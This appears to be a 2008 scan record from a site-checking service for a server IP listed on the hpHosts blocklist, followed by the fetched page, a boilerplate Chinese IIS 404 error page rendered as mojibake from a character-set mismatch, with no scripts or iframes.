Server IP: 121.11.76.85 [ Resolution failed ]

hpHosts Status: Listed [ Class: EXP ]

MDL Status: Not Listed

PhishTank Status: Not Listed

Scripts: 0

iFrames: 0

via Proxy: MontanaMenagerie (US)

Date: 16 September 2008

Time: 03:21:39:21

*****************************************************************

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<HTML><HEAD><TITLE>ÎÞ·¨ÕÒµ½¸ÃÒ³</TITLE>

<META HTTP-EQUIV="Content-Type" Content="text/html; charset=GB2312">

<STYLE type="text/css">

BODY { font: 9pt/12pt ËÎÌå }

H1 { font: 12pt/15pt ËÎÌå }

H2 { font: 9pt/12pt ËÎÌå }

A:link { color: red }

A:visited { color: maroon }

</STYLE>

</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>



<h1>ÎÞ·¨ÕÒµ½¸ÃÒ³</h1>

ÄúÕýÔÚËÑË÷µÄÒ³Ãæ¿ÉÄÜÒѾ­É¾³ý¡¢¸üÃû»òÔÝʱ²»¿ÉÓá£

<hr>

<p>Çë³¢ÊÔÒÔϲÙ×÷£º</p>

<ul>

<li>È·±£ä¯ÀÀÆ÷µÄµØÖ·À¸ÖÐÏÔʾµÄÍøÕ¾µØÖ·µÄƴдºÍ¸ñʽÕýÈ·ÎÞÎó¡£</li>

<li>Èç¹ûͨ¹ýµ¥»÷Á´½Ó¶øµ½´ïÁ˸ÃÍøÒ³£¬ÇëÓëÍøÕ¾¹ÜÀíÔ±ÁªÏµ£¬Í¨ÖªËûÃǸÃÁ´½ÓµÄ¸ñʽ²»ÕýÈ·¡£

</li>

<li>µ¥»÷<a href="javascript:history.back(1)">ºóÍË</a>°´Å¥³¢ÊÔÁíÒ»¸öÁ´½Ó¡£</li>

</ul>

<h2>HTTP ´íÎó 404 - Îļþ»òĿ¼δÕÒµ½¡£<br>Internet ÐÅÏ¢·þÎñ (IIS)</h2>

<hr>

<p>¼¼ÊõÐÅÏ¢£¨Îª¼¼ÊõÖ§³ÖÈËÔ±Ìṩ£©</p>

<ul>

<li>תµ½ <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft ²úÆ·Ö§³Ö·þÎñ</a>²¢ËÑË÷°üÀ¨“HTTP”ºÍ“404”µÄ±êÌâ¡£</li>

<li>´ò¿ª“IIS °ïÖú”£¨¿ÉÔÚ IIS ¹ÜÀíÆ÷ (inetmgr) ÖзÃÎÊ£©£¬È»ºóËÑË÷±êÌâΪ“ÍøÕ¾ÉèÖÔ¡¢“³£¹æ¹ÜÀíÈÎÎñ”ºÍ“¹ØÓÚ×Ô¶¨Òå´íÎóÏûÏ¢”µÄÖ÷Ìâ¡£</li>

</ul>



</TD></TR></TABLE></BODY></HTML>